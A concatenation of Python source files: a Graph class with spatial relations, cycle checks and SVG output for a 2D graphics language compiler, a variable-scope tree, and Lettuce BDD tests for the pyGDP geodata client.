# TODO: [Note for the future] This method might not be necessary as querying graph.relation_matrix_XYZ[v1][v2] is quite intuitive BUT every vertex has to be a part of some graph at all times
"""
Adds a new vertex with given relation to this one's neighbours and this one to the new vertex's with an opposite relation
:param v: New vertex neighbour of self
:param relation: Relation of self to neighbour vertex; read: "self RELATION v", e.x. for relation=Relation.LEFT: "self LEFT v", so "v RIGHT self"
:return:
"""
# Basic 2D relations are antagonistic
if relation == Relation.LEFT:
v.LEFT[self] = None
self.RIGHT[v] = None
elif relation == Relation.RIGHT:
v.RIGHT[self] = None
self.LEFT[v] = None
elif relation == Relation.TOP:
v.TOP[self] = None
self.BOT[v] = None
elif relation == Relation.BOT:
v.BOT[self] = None
self.TOP[v] = None
# AT-xyz relations are mutual (bidirectional)
elif relation == Relation.ATLEFT:
v.ATLEFT[self] = None
self.ATLEFT[v] = None
elif relation == Relation.ATRIGHT:
v.ATRIGHT[self] = None
self.ATRIGHT[v] = None
elif relation == Relation.ATTOP:
v.ATTOP[self] = None
self.ATTOP[v] = None
elif relation == Relation.ATBOT:
v.ATBOT[self] = None
self.ATBOT[v] = None
# TODO: Z-axis relations
elif relation == Relation.IN:
v.IN = self
self.CONTAINED[v] = None
elif relation == Relation.CONTAINED:
v.CONTAINED[self] = None
self.IN = v
elif relation == Relation.ON:
v.ON[self] = None
self.UNDER[v] = None
elif relation == Relation.UNDER:
v.UNDER[self] = None
self.ON[v] = None
else:
raise UndefinedRelationException(str(relation))
def get_neighbours_by_relation(self, r: Relation):
if r == Relation.UNRELATED:
raise UnrelatedShapesException("You tried retrieving all shapes UNRELATED to this one which is an illegal operation")
elif r == Relation.LEFT:
return self.LEFT
elif r == Relation.RIGHT:
return self.RIGHT
elif r == Relation.TOP:
return self.TOP
elif r == Relation.BOT:
return self.BOT
elif r == Relation.ATLEFT:
return self.ATLEFT
elif r == Relation.ATRIGHT:
return self.ATRIGHT
elif r == Relation.ATTOP:
return self.ATTOP
elif r == Relation.ATBOT:
return self.ATBOT
else:
raise UndefinedRelationException(f"Relation denoted by {r} is not defined")
def remove_neighbour(self, neighbour):
"""
WARNING: This function is deprecated (for the time being); don't use it
:param neighbour:
:return:
"""
if neighbour in self.LEFT:
self.LEFT.pop(neighbour)
neighbour.RIGHT.pop(self)
elif neighbour in self.RIGHT:
self.RIGHT.pop(neighbour)
neighbour.LEFT.pop(self)
elif neighbour in self.TOP:
self.TOP.pop(neighbour)
neighbour.BOT.pop(self)
elif neighbour in self.BOT:
self.BOT.pop(neighbour)
neighbour.TOP.pop(self)
elif neighbour == self.IN:
self.IN = None
neighbour.CONTAINED.pop(self)
elif neighbour in self.CONTAINED:
self.CONTAINED.pop(neighbour)
neighbour.IN = None
elif neighbour in self.ON:
self.ON.pop(neighbour)
neighbour.UNDER.pop(self)
elif neighbour in self.UNDER:
self.UNDER.pop(neighbour)
neighbour.ON.pop(self)
class Graph:
def __init__(self, x=0, y=0, width=100, height=100, viewport_size=None):
self.vertices: OrderedDict[Vertex, Any] = OrderedDict() # all unique vertices in a graph
# Position of the top-left corner of this graph's bounding box
self.x = x
self.y = y
# Width and height of this graph's bounding box (width in the widest point and height in the highest point)
self.width = width
self.height = height
# SVG elem that contains this graph's elements
self.svg_elem = SVG(insert=(f"{x}%", f"{y}%"), size=(f"{width}%", f"{height}%"))
self.relation_matrix_horizontal: Dict[
Vertex, Dict[Vertex, Relation]] = OrderedDict() # all horizontal relations in the shape graph
self.relation_matrix_vertical: Dict[
Vertex, Dict[Vertex, Relation]] = OrderedDict() # all vertical relations in the shape graph
@property
def content_width(self):
return 0 if len(self.vertices) == 0 else max(v.x + v.width for v in self.vertices.keys()) - min(
v.x for v in self.vertices.keys())
@property
def content_height(self):
return 0 if len(self.vertices) == 0 else max(v.y + v.height for v in self.vertices.keys()) - min(
v.y for v in self.vertices.keys())
@property
def content_x(self):
return 0 if len(self.vertices) == 0 else min(v.x for v in self.vertices.keys())
@property
def content_y(self):
return 0 if len(self.vertices) == 0 else min(v.y for v in self.vertices.keys())
def add_vertex(self, v: Vertex):
if v not in self.vertices.keys():
# Add relations between this new vertex and other old vertices
self.relation_matrix_horizontal[v] = {other_v: Relation.UNRELATED for other_v in self.vertices.keys()}
self.relation_matrix_vertical[v] = {other_v: Relation.UNRELATED for other_v in self.vertices.keys()}
# Add relations between other old vertices and this new vertex
for key in self.relation_matrix_horizontal.keys():
if key is not v:
self.relation_matrix_horizontal[key][v] = Relation.UNRELATED
for key in self.relation_matrix_vertical.keys():
if key is not v:
self.relation_matrix_vertical[key][v] = Relation.UNRELATED
# Add new vertex to vertices set
self.vertices[v] = None
# Give the vertex a reference to this Graph
v.graph = self
def add_relation(self, v_from: Vertex, v_to: Vertex, r: Relation):
# TODO: A |top B - A jest powyżej od B, przylega do jego górnej krawędzi
# TODO: rect A [10%, EXPAND_TO_FILL] - EXPAND_TO_FILL means 100% - the rest of the shapes
"""
:param v_from:
:param v_to:
:param r:
:raises UndeclaredShapeException
:raises RedundantRelationException
:raises CyclicRelationsException
:return:
"""
# Both shapes should have already been added to this graph before defining relations between them
if v_from is None or v_to is None or v_from not in self.vertices.keys() or v_to not in self.vertices.keys():
logging.info(f"{v_from=} {v_to=}")
raise UndeclaredShapeException(f"{v_from=} {v_to=}")
if v_from is v_to:
raise RedundantRelationException
# Modify relation in respective matrix; note that you need to modify it for both vertices
if r in (Relation.LEFT, Relation.RIGHT, Relation.ATLEFT, Relation.ATRIGHT):
self.relation_matrix_horizontal[v_from][v_to] = r
if r == Relation.LEFT:
# Add this relation to all ATRIGHT neighbours of v_from and opposite to all ATLEFT of v_to
for atr in v_from.ATRIGHT.keys():
self.relation_matrix_horizontal[atr][v_to] = r
self.relation_matrix_horizontal[v_to][atr] = -r
atr.add_neighbour(v_to, r)
for atl in v_to.ATLEFT.keys():
self.relation_matrix_horizontal[atl][v_from] = -r
self.relation_matrix_horizontal[v_from][atl] = r
atl.add_neighbour(v_from, -r)
for atl in v_to.ATLEFT.keys():
for atr, _ in v_from.ATRIGHT.keys():
self.relation_matrix_horizontal[atr][atl] = r
self.relation_matrix_horizontal[atl][atr] = -r
atr.add_neighbour(atl, r)
elif r == Relation.RIGHT:
# Add this relation to all ATLEFT neighbours of v_from and opposite to all ATRIGHT of v_to
for atl in v_from.ATLEFT.keys():
self.relation_matrix_horizontal[atl][v_to] = r
self.relation_matrix_horizontal[v_to][atl] = -r
atl.add_neighbour(v_to, r)
for atr in v_to.ATRIGHT.keys():
self.relation_matrix_horizontal[atr][v_from] = -r
self.relation_matrix_horizontal[v_from][atr] = r
atr.add_neighbour(v_from, -r)
for atr in v_to.ATRIGHT.keys():
for atl, _ in v_from.ATLEFT.keys():
self.relation_matrix_horizontal[atr][atl] = -r
self.relation_matrix_horizontal[atl][atr] = r
atr.add_neighbour(atl, -r)
elif r == Relation.ATLEFT:
# Snapshot pre-changes sets of neighbours so we don't mutate structures that we work on
atla = v_from.ATLEFT.copy()
atlb = v_to.ATLEFT.copy()
la = v_from.LEFT.copy()
lb = v_to.LEFT.copy()
for atl in atla.keys():
self.relation_matrix_horizontal[atl][v_to] = r
self.relation_matrix_horizontal[v_to][atl] = r
atl.add_neighbour(v_to, r)
for atl in atlb.keys():
self.relation_matrix_horizontal[atl][v_from] = r
self.relation_matrix_horizontal[v_from][atl] = r
atl.add_neighbour(v_from, r)
for aatl in atla.keys():
for batl in atlb.keys():
self.relation_matrix_horizontal[aatl][batl] = r
self.relation_matrix_horizontal[batl][aatl] = r
aatl.add_neighbour(batl, r)
for l in la.keys():
self.relation_matrix_horizontal[l][v_to] = Relation.LEFT
self.relation_matrix_horizontal[v_to][l] = Relation.RIGHT
l.add_neighbour(v_to, Relation.LEFT)
for l in lb.keys():
self.relation_matrix_horizontal[l][v_from] = Relation.LEFT
self.relation_matrix_horizontal[v_from][l] = Relation.RIGHT
l.add_neighbour(v_from, Relation.LEFT)
for al in la.keys():
for bl in lb.keys():
self.relation_matrix_horizontal[al][bl] = (-r).at()
self.relation_matrix_horizontal[bl][al] = (-r).at()
al.add_neighbour(bl, (-r).at())
elif r == Relation.ATRIGHT:
# Snapshot pre-changes sets of neighbours so we don't mutate structures that we work on
atra = v_from.ATRIGHT.copy()
atrb = v_to.ATRIGHT.copy()
ra = v_from.RIGHT.copy()
rb = v_to.RIGHT.copy()
for atr in atra.keys():
self.relation_matrix_horizontal[atr][v_to] = r
self.relation_matrix_horizontal[v_to][atr] = r
atr.add_neighbour(v_to, r)
for atr in atrb.keys():
self.relation_matrix_horizontal[atr][v_from] = r
self.relation_matrix_horizontal[v_from][atr] = r
atr.add_neighbour(v_from, r)
for aatr in atra.keys():
for batr in atrb.keys():
self.relation_matrix_horizontal[aatr][batr] = r
self.relation_matrix_horizontal[batr][aatr] = r
aatr.add_neighbour(batr, r)
for rr in ra.keys():
self.relation_matrix_horizontal[rr][v_to] = Relation.RIGHT
self.relation_matrix_horizontal[v_to][rr] = Relation.LEFT
rr.add_neighbour(v_to, Relation.RIGHT)
for rr in rb.keys():
self.relation_matrix_horizontal[rr][v_from] = Relation.RIGHT
self.relation_matrix_horizontal[v_from][rr] = Relation.LEFT
rr.add_neighbour(v_from, Relation.RIGHT)
for ar in ra.keys():
for br in rb.keys():
self.relation_matrix_horizontal[ar][br] = (-r).at()
self.relation_matrix_horizontal[br][ar] = (-r).at()
ar.add_neighbour(br, (-r).at())
# Inline if is crucial - AT-xyz relations are bidirectional:
# "A ATLEFT B" is the same as "B ATLEFT A"
self.relation_matrix_horizontal[v_to][v_from] = r if r in (Relation.ATLEFT, Relation.ATRIGHT) else -r
if self._invalid_horizontal_relations():
raise CyclicRelationsException(
f"Relation {r=} between {v_from.uid=} and {v_to.uid=} causes a cycle in horizontal relations")
elif r in (Relation.TOP, Relation.BOT, Relation.ATTOP, Relation.ATBOT):
self.relation_matrix_vertical[v_from][v_to] = r
if r == Relation.TOP:
# Add this relation to all ATBOT neighbours of v_from and opposite to all ATTOP of v_to
for atr in v_from.ATBOT.keys():
self.relation_matrix_vertical[atr][v_to] = r
self.relation_matrix_vertical[v_to][atr] = -r
atr.add_neighbour(v_to, r)
for atl in v_to.ATTOP.keys():
self.relation_matrix_vertical[atl][v_from] = -r
self.relation_matrix_vertical[v_from][atl] = r
atl.add_neighbour(v_from, -r)
for atl in v_to.ATTOP.keys():
for atr, _ in v_from.ATBOT.keys():
self.relation_matrix_vertical[atr][atl] = r
self.relation_matrix_vertical[atl][atr] = -r
atr.add_neighbour(atl, r)
elif r == Relation.BOT:
# Add this relation to all ATTOP neighbours of v_from and opposite to all ATBOT of v_to
for atl in v_from.ATTOP.keys():
self.relation_matrix_vertical[atl][v_to] = r
self.relation_matrix_vertical[v_to][atl] = -r
atl.add_neighbour(v_to, r)
for atr in v_to.ATBOT.keys():
self.relation_matrix_vertical[atr][v_from] = -r
self.relation_matrix_vertical[v_from][atr] = r
atr.add_neighbour(v_from, -r)
for atr in v_to.ATBOT.keys():
for atl, _ in v_from.ATTOP.keys():
self.relation_matrix_vertical[atr][atl] = -r
self.relation_matrix_vertical[atl][atr] = r
atr.add_neighbour(atl, -r)
elif r == Relation.ATTOP:
# Snapshot pre-changes sets of neighbours so we don't mutate structures that we work on
atla = v_from.ATTOP.copy()
atlb = v_to.ATTOP.copy()
la = v_from.TOP.copy()
lb = v_to.TOP.copy()
for atl in atla.keys():
self.relation_matrix_vertical[atl][v_to] = r
self.relation_matrix_vertical[v_to][atl] = r
atl.add_neighbour(v_to, r)
for atl in atlb.keys():
self.relation_matrix_vertical[atl][v_from] = r
self.relation_matrix_vertical[v_from][atl] = r
atl.add_neighbour(v_from, r)
for aatl in atla.keys():
for batl in atlb.keys():
self.relation_matrix_vertical[aatl][batl] = r
self.relation_matrix_vertical[batl][aatl] = r
aatl.add_neighbour(batl, r)
for l in la.keys():
self.relation_matrix_vertical[l][v_to] = Relation.TOP
self.relation_matrix_vertical[v_to][l] = Relation.BOT
l.add_neighbour(v_to, Relation.TOP)
for l in lb.keys():
self.relation_matrix_vertical[l][v_from] = Relation.TOP
self.relation_matrix_vertical[v_from][l] = Relation.BOT
l.add_neighbour(v_from, Relation.TOP)
for al in la.keys():
for bl in lb.keys():
self.relation_matrix_vertical[al][bl] = (-r).at()
self.relation_matrix_vertical[bl][al] = (-r).at()
al.add_neighbour(bl, (-r).at())
elif r == Relation.ATBOT:
# Snapshot pre-changes sets of neighbours so we don't mutate structures that we work on
atra = v_from.ATBOT.copy()
atrb = v_to.ATBOT.copy()
ra = v_from.BOT.copy()
rb = v_to.BOT.copy()
for atr in atra.keys():
self.relation_matrix_vertical[atr][v_to] = r
self.relation_matrix_vertical[v_to][atr] = r
atr.add_neighbour(v_to, r)
for atr in atrb.keys():
self.relation_matrix_vertical[atr][v_from] = r
self.relation_matrix_vertical[v_from][atr] = r
atr.add_neighbour(v_from, r)
for aatr in atra.keys():
for batr in atrb.keys():
self.relation_matrix_vertical[aatr][batr] = r
self.relation_matrix_vertical[batr][aatr] = r
aatr.add_neighbour(batr, r)
for rr in ra.keys():
self.relation_matrix_vertical[rr][v_to] = Relation.BOT
self.relation_matrix_vertical[v_to][rr] = Relation.TOP
rr.add_neighbour(v_to, Relation.BOT)
for rr in rb.keys():
self.relation_matrix_vertical[rr][v_from] = Relation.BOT
self.relation_matrix_vertical[v_from][rr] = Relation.TOP
rr.add_neighbour(v_from, Relation.BOT)
for ar in ra.keys():
for br in rb.keys():
self.relation_matrix_vertical[ar][br] = (-r).at()
self.relation_matrix_vertical[br][ar] = (-r).at()
ar.add_neighbour(br, (-r).at())
# Inline if is crucial - AT-xyz relations are bidirectional:
# "A ATTOP B" is the same as "B ATTOP A"
self.relation_matrix_vertical[v_to][v_from] = r if r in (Relation.ATTOP, Relation.ATBOT) else -r
if self._invalid_vertical_relations():
raise CyclicRelationsException(
f"Relation {r=} between {v_from.uid=} and {v_to.uid=} causes a cycle in vertical relations")
# TODO: Implement incidence matrices for other relations
else:
return
# TODO: [Note for the future] This method might not be necessary as querying graph.relation_matrix_XYZ[v1][v2] is quite intuitive BUT every vertex has to be a part of some graph
# Give vertex info about new neighbour
v_from.add_neighbour(v_to, r)
def _is_cyclic_horizontal_util(self, v: Vertex, visited: Dict[Vertex, bool], rec_stack: Dict[Vertex, bool]) -> bool:
"""
Visit vertex "v" and check if any neighbour was visited previously
:param v: Vertex to check
:param visited: Dictionary of vertices, keys are vertices, values are True if visited
:param rec_stack: Keys are vertices, values are True if scheduled for visit
:return:
"""
# Mark current node as visited and
# adds to recursion stack
visited[v] = True
rec_stack[v] = True
# Recur for all neighbours
# if any neighbour is visited and in
# rec_stack then graph is cyclic
# NOTE: Only check LEFT relation
for neighbour in (neigh for neigh, relation in self.relation_matrix_horizontal[v].items() if
relation == Relation.LEFT):
if not visited[neighbour]:
if self._is_cyclic_horizontal_util(neighbour, visited, rec_stack):
return True
elif rec_stack[neighbour]:
return True
# The node needs to be popped from
# recursion stack before function ends
rec_stack[v] = False
return False
def _invalid_horizontal_relations(self) -> bool:
"""
Check if there is a cycle in the horizontal relations graph
:return: True if horizontal relations graph is cyclic
"""
visited = {v: False for v in self.vertices.keys()}
rec_stack = {v: False for v in self.vertices.keys()}
for node in self.vertices.keys():
if not visited[node]:
if self._is_cyclic_horizontal_util(node, visited, rec_stack):
return True
return False
def _is_cyclic_vertical_util(self, v: Vertex, visited: Dict[Vertex, bool], rec_stack: Dict[Vertex, bool]) -> bool:
"""
Visit vertex "v" and check if any neighbour was visited previously
:param v: Vertex to check
:param visited: Dictionary of vertices, keys are vertices, values are True if visited
:param rec_stack: Keys are vertices, values are True if scheduled for visit
:return:
"""
# Mark current node as visited and
# adds to recursion stack
visited[v] = True
rec_stack[v] = True
# Recur for all neighbours
# if any neighbour is visited and in
# rec_stack then graph is cyclic
# NOTE: Only check TOP relation
for neighbour in (neigh for neigh, relation in self.relation_matrix_vertical[v].items() if
relation == Relation.TOP):
if not visited[neighbour]:
if self._is_cyclic_vertical_util(neighbour, visited, rec_stack):
return True
elif rec_stack[neighbour]:
return True
# The node needs to be popped from
# recursion stack before function ends
rec_stack[v] = False
return False
def _invalid_vertical_relations(self) -> bool:
"""
Check if there is a cycle in the vertical relations graph
:return: True if vertical relations graph is cyclic
"""
visited = {v: False for v in self.vertices.keys()}
rec_stack = {v: False for v in self.vertices.keys()}
for node in self.vertices.keys():
if not visited[node]:
if self._is_cyclic_vertical_util(node, visited, rec_stack):
return True
return False
def print_relations(self, v: Vertex) -> None:
# TODO generate SVG for provided parameters
if v not in self.vertices.keys():
logging.debug("Not in graph")
else:
logging.info(f"Found vertex {v.shape}:{v.uid}")
for v2, relation in self.relation_matrix_horizontal[v].items():
logging.info(f"{v2.shape}:{v2.uid}")
def merge_with(self, other, r: Relation = Relation.UNRELATED):
# TODO: Parameter "r" taken into account (as stated in docstring)
"""
Merge vertices and relations of the other graph into this one
:param r: [optional] Make all self.vertices satisfy relation "r" with all other.vertices
:param other: Other Graph
:return:
"""
# Add all new vertices
for vertex in other.vertices.keys():
self.add_vertex(vertex)
# Add all new relations
for v1, relation_dict in other.relation_matrix_horizontal.items():
for v2, relation in relation_dict.items():
self.add_relation(v1, v2, relation)
# Clear vertex data from other Graph (they are now a part of this one)
other.vertices.clear()
other.relation_matrix_horizontal.clear()
def find_vertex(self, vertex_id: str) -> Vertex:
for vertex in self.vertices.keys():
if str(vertex.uid) == str(vertex_id):
return vertex
raise UndeclaredShapeException(vertex_id)
def remove_vertex(self, v: Vertex):
if v in self.vertices:
# Add relations between this new vertex and other old vertices
self.relation_matrix_horizontal.pop(v)
self.relation_matrix_vertical.pop(v)
# Add relations between other old vertices and this new vertex
for key in self.relation_matrix_horizontal.keys():
if key is not v:
del self.relation_matrix_horizontal[key][v]
for key in self.relation_matrix_vertical.keys():
if key is not v:
del self.relation_matrix_vertical[key][v]
# Remove from vertices list
self.vertices.pop(v)
def sort_horizontal(self):
"""
Make sure all horizontal relations are valid
:return:
"""
for v1, relation_map in self.relation_matrix_horizontal.items():
for v2, relation in relation_map.items():
v2_was_leftmost = self.x == v2.x
v2_was_rightmost = self.x + self.width == v2.x + v2.width
# ALWAYS MOVE THE OTHER VERTEX
if relation is Relation.LEFT and not v1.is_left(v2):
v2.to_right_of(v1)
elif relation is Relation.RIGHT and not v1.is_right(v2):
v2.to_left_of(v1)
elif relation is Relation.ATLEFT and not v1.is_atleft(v2):
v2.to_atleft_of(v1)
elif relation is Relation.ATRIGHT and not v1.is_atright(v2):
v2.to_atright_of(v1)
# # UPDATE GRAPH BOUNDING BOX VALUES
# self._update_horizontal()
def sort_vertical(self):
"""
Make sure all vertical relations are valid
:return:
"""
for v1, relation_map in self.relation_matrix_vertical.items():
for v2, relation in relation_map.items():
v2_was_topmost = self.y == v2.y
v2_was_botmost = self.y + self.height == v2.y + v2.height
# ALWAYS MOVE THE OTHER VERTEX
if relation is Relation.TOP and not v1.is_top(v2):
v2.to_bot_of(v1)
elif relation is Relation.BOT and not v1.is_bot(v2):
v2.to_top_of(v1)
elif relation is Relation.ATTOP and not v1.is_attop(v2):
v2.to_attop_of(v1)
elif relation is Relation.ATBOT and not v1.is_atbot(v2):
v2.to_atbot_of(v1)
#
# # UPDATE GRAPH BOUNDING BOX VALUES
# self._update_vertical()
# self._update_horizontal()
def _update_x(self):
self.x = min(v.x for v in self.vertices.keys())
def _update_y(self):
self.y = min(v.y for v in self.vertices.keys())
def _update_horizontal(self):
self._update_x()
self.width = max(v.x + v.width for v in self.vertices.keys()) - self.x
def _update_vertical(self):
self._update_y()
self.height = max(v.y + v.height for v in self.vertices.keys()) - self.y
def update_position_and_size(self):
"""
Recalculate graph's X, Y, width and height based on its vertices
:return:
"""
self._update_horizontal()
self._update_vertical()
def content_move_horizontal(self, dist: int, parent_width=1):
"""
Shift all shapes by the given distance in the X axis.
:param dist: Positive integer to move right, negative to move left
:return:
"""
for v in self.vertices.keys():
v.x += dist
self.x += dist
def content_move_vertical(self, dist: int):
"""
Shift all shapes by the given distance in the Y axis.
:param dist: Positive integer to move down, negative to move up
:return:
"""
for v in self.vertices.keys():
v.y += dist
self.y += dist
def center(self, pw=100, ph=100, px: int = 0, py: int = 0):
"""
Center this graph in given parent dimensions
:param pw: Parent width
:param ph: Parent height
:param px: Parent X; 0 for viewport
:param py: Parent Y; 0 for viewport
:return:
"""
target_x = (100 - self.width) / 2
target_y = (100 - self.height) / 2
self.x = target_x
self.y = target_y
def content_center_in_self(self):
target_x = (100 - self.content_width) / 2
target_y = (100 - self.content_height) / 2
if self.content_x != target_x:
self.content_move_to(target_x, self.content_y)
if self.content_y != target_y:
self.content_move_to(self.content_x, target_y)
def content_move_to(self, x, y):
self.content_move_horizontal(x - self.content_x)
self.content_move_vertical(y - self.content_y)
def replace_vertex(self, vertex_to_replace: Vertex, new_vertex: Vertex):
self._copy_contents(vertex_to_replace, new_vertex)
self.add_vertex(new_vertex)
for v_from in self.relation_matrix_horizontal.keys():
if v_from != new_vertex and v_from in self.vertices.keys():
for v_to in list(self.relation_matrix_horizontal[v_from].keys()):
if v_to == vertex_to_replace:
rel = self.relation_matrix_horizontal[v_from][v_to]
self.add_relation(v_from=v_from, v_to=new_vertex, r=rel)
if rel != Relation.UNRELATED:
v_from.add_neighbour(new_vertex, rel)
v_from.remove_neighbour(vertex_to_replace)
self.relation_matrix_horizontal[v_from].pop(vertex_to_replace)
for v_from in self.relation_matrix_vertical.keys():
if v_from != new_vertex and v_from in self.vertices.keys():
for v_to in list(self.relation_matrix_vertical[v_from].keys()):
if v_to == vertex_to_replace:
rel = self.relation_matrix_vertical[v_from][v_to]
self.add_relation(v_from=v_from, v_to=new_vertex, r=rel)
if rel != Relation.UNRELATED:
v_from.add_neighbour(new_vertex, rel)
v_from.remove_neighbour(vertex_to_replace)
self.relation_matrix_vertical[v_from].pop(vertex_to_replace)
# Remove from graph in general
self.vertices.pop(vertex_to_replace)
# Remove from horizontal graph
self.relation_matrix_horizontal.pop(vertex_to_replace)
self.relation_matrix_horizontal[new_vertex].pop(vertex_to_replace)
# Remove from vertical graph
self.relation_matrix_vertical.pop(vertex_to_replace)
self.relation_matrix_vertical[new_vertex].pop(vertex_to_replace)
def _copy_contents(self, vertex_to_replace: Vertex, new_vertex: Vertex):
new_vertex.bb_w = vertex_to_replace.bb_w
new_vertex.bb_h = vertex_to_replace.bb_h
new_vertex.updated = vertex_to_replace.updated
new_vertex.drawn = vertex_to_replace.drawn
new_vertex.content = vertex_to_replace.content
# TODO: add IN relation
relation_set_pairs = zip(
[new_vertex.LEFT, new_vertex.RIGHT, new_vertex.TOP, new_vertex.BOT,
new_vertex.CONTAINED, new_vertex.ON, new_vertex.UNDER],
[vertex_to_replace.LEFT, vertex_to_replace.RIGHT, vertex_to_replace.TOP, vertex_to_replace.BOT,
vertex_to_replace.CONTAINED, vertex_to_replace.ON, vertex_to_replace.UNDER]
)
for new_relation, replaced_relation in relation_set_pairs:
if new_relation is not None:
new_relation.update(replaced_relation)
else:
new_relation = replaced_relation
new_vertex.uid = vertex_to_replace.uid
new_vertex.graph = vertex_to_replace.graph
new_vertex.adjust_size_based_on_shape()
@property
def disconnected(self):
if len(self.vertices) == 0:
raise StopIteration("No vertices in this graph")
visited = OrderedDict()
tbv = OrderedDict() # To Be Visited
any_v, _ = self.vertices.copy().popitem()
tbv[any_v] = None # Take any element of the graph
while len(tbv) > 0:
curr, _ = tbv.popitem()
visited[curr] = None
for n in curr.neighbours:
if n not in visited.keys() and n not in tbv.keys():
tbv[n] = None
return len(visited.keys()) != len(self.vertices.keys())
def _draw_vertex(self, v: Vertex, from_caller=False):
# TODO: Draw all neighbours and neighbours' neighbours etc.
"""
Basic algo:
1. Go "up" (check the IN reference) until you reach the root of the graph
NOTE: When adding a neighbour A to a Vertex B CONTAINED in some shape X, you should add "A IN X" relation automatically as well
2. Draw root shape parent_graphX
3. Call algo for each of X's neighbours until there are no neighbours to draw
:param v:
:param from_caller:
:return:
"""
if v.drawn:
return
self.svg_elem.add(v.content)
v.drawn = True
if from_caller:
for n in v.neighbours:
self._draw_vertex(n, from_caller=True)
def export_as_vertex(self) -> Vertex:
if self.disconnected:
raise DisconnectedGraphException(
f"Some shapes have no clear relations to each other. Aborting drawing\n{self.relation_matrix_horizontal=}\n{self.relation_matrix_vertical=}")
self.sort_horizontal()
self.sort_vertical()
self.content_center_in_self()
for v in self.vertices.keys():
v.center_if_legal()
for v in self.vertices.keys():
self.svg_elem.add(v.content)
return Vertex(content=self.svg_elem.copy())
def draw(self, canvas, caller_vertex: Vertex = None):
"""
:param canvas:
:param caller_vertex: In 2Dim you can draw a graph itself via Graph.draw(), or Graph.draw() can be called by its child vertex; in latter case only the vertices connected to caller or its neighbours or their neighbours etc. are drawn
:return:
"""
if self.disconnected:
raise DisconnectedGraphException(
f"Some shapes have no clear relations to each other. Aborting drawing\n{self.relation_matrix_horizontal=}\n{self.relation_matrix_vertical=}")
self.sort_horizontal()
self.sort_vertical()
self.content_center_in_self()
for v in self.vertices.keys():
v.center_if_legal()
if caller_vertex is not None:
# Only draw vertices connected to the caller of Graph.draw()
self._draw_vertex(caller_vertex, from_caller=True)
else:
# Draw all vertices (might produce a disjointed graph)
for v in self.vertices.keys():
self._draw_vertex(v, from_caller=False)
canvas.add(self.svg_elem)
canvas.save()
```
#### File: Language-for-2D-graphics/twodim_compiler/VariablesTree.py
```python
import treelib
from exceptions import VariableNotFoundError
class VariablesTree:
def __init__(self):
self.tree = treelib.Tree()
self.tree.create_node(tag="GlobalVars", identifier="GlobalVars")
def add_variable(self, tag, name, content, scope=None):
'''
:param name: name of the variable added
:param content: Vertex or Graph representing the variable
:param scope: name of the function the variable is being created in or None in case it's a global variable
'''
if scope is None:
self.tree.create_node(tag=tag, identifier=name, parent=self.tree.get_node(nid="GlobalVars"), data=content)
return
self.tree.create_node(tag=tag, identifier=name, parent=self.tree.get_node(nid=scope), data=content)
def add_scope_subtree(self, tag, name, scope=None):
'''
:param name: name of the variable added
:param scope: name of the function the variable is being created in or None in case it's a global variable
'''
if scope is None:
self.tree.create_node(tag=tag, identifier=name, parent=self.tree.get_node(nid="GlobalVars"))
return
self.tree.create_node(tag=tag, identifier=name, parent=self.tree.get_node(nid=scope))
def find_var_by_tag(self, tag, scope=None):
'''
:param tag: tag(name) of the variable
:param scope: the most inner scope to look in (nid)
:return: data from a node of the variable tree or raise exception
'''
if scope is None:
scope = self.tree.root
scope_vars = self.tree.children(scope)
vars_found = list(filter(lambda x: x.tag == tag, scope_vars))
while len(vars_found) == 0 and self.tree.parent(scope) is not None:
scope = self.tree.parent(scope).identifier
scope_vars = self.tree.children(scope)
vars_found = list(filter(lambda x: x.tag == tag, scope_vars))
if len(vars_found) == 0:
raise VariableNotFoundError(f"Failed to find variable \"{tag}\". Variable name \"{tag}\" contains"
f" a typo or the variable is unavailable from this scope.")
return vars_found[0]
``` |
{
"source": "jiwalker-usgs/pyGDP",
"score": 2
} |
#### File: Lettuce_Tests/features/Test_Feature_OPenDAP.py
```python
import pyGDP
import os
from lettuce import *
from nose.tools import assert_equal
@step(r'I already have my boundary shapefile call from GDP')
def alabama_conus_area(step):
world.shapefile = 'sample:CONUS_states'
world.attribute = 'STATE'
world.value = 'Alabama'
@step(r'I have set up my precipitaion data call from GDP')
def dataset_call(step):
world.dataSetURI = 'dods://cida.usgs.gov/thredds/dodsC/gmo/GMO_w_meta.ncml'
world.dataType = 'Prcp'
world.timeStart = '1950-01-01T00:00:00.000Z'
world.timeEnd = '1950-01-02T00:00:00.000Z'
@step(r'I run submitFeatureCoverageOPenDAP in pyGDP')
def test_FCO(step):
test_pyGDP = create_web_processing_object()
world.output_file = test_pyGDP.submitFeatureCoverageOPenDAP(world.shapefile, world.dataSetURI, world.dataType, world.timeStart, world.timeEnd, world.attribute, world.value, verbose=False, outputfname='testOPenDAP_testfile_test', sleepSecs=15)
def create_web_processing_object():
new_web_processing = pyGDP.pyGDPwebProcessing()
return new_web_processing
@step(r'I know my output is something I expect')
def check_FCO_output(step):
assert_equal(os.path.getsize(world.output_file), 14312)
```
#### File: Lettuce_Tests/features/Test_Namespaces.py
```python
import pyGDP
from urlparse import urlparse
import httplib
from lettuce import *
#All the global variables in pyGDP:
@step(r'Given I have all my namespaces defined in pyGDP')
def define_those_namespaces(step):
world.name_spaces = [
'upload_URL' ,\
'WPS_URL' ,\
'WPS_Service' ,\
'CSWURL' ,\
'WPS_DEFAULT_NAMESPACE' ,\
'WPS_DEFAULT_SCHEMA_LOCATION' ,\
'WPS_DEFAULT_VERSION' ,\
'WFS_NAMESPACE' ,\
'OGC_NAMESPACE' ,\
'GML_NAMESPACE' ,\
'GML_SCHEMA_LOCATION' ,\
'DRAW_NAMESPACE' ,\
'SMPL_NAMESPACE' ,\
'UPLD_NAMESPACE' ,\
'CSW_NAMESPACE'
]
@step(r'And that each namespace points to a working URL or part of an XML')
def check_populated_namespaces(step):
for space in world.name_spaces:
assert(space != None)
@step(r'When I check the http response from each url')
def check_those_responses(step):
world.responses = []
for x in range(len(world.name_spaces)):
to_evaluate = 'pyGDP.'+world.name_spaces[x]
world.responses += [[to_evaluate, server_status_is_good(eval(to_evaluate))[1]]]
@step(r'Then I get a working response for each one')
def check_responses(step):
for response in world.responses:
print response[0] + ': ' + str(response[1])
assert response[1] == True
def server_status_is_good(url):
host, path = urlparse(url)[1:3]
try:
connection = httplib.HTTPConnection(host)
connection.request('HEAD',path)
response = connection.getresponse().status
if response > 400:
return False
return 'Good', True
except StandardError:
return url, True
def print_status():
for x in range(len(name_spaces)):
to_evaluate = 'pyGDP.'+name_spaces[x]
print to_evaluate + ':',
print server_status_is_good(eval(to_evaluate))[0]
```
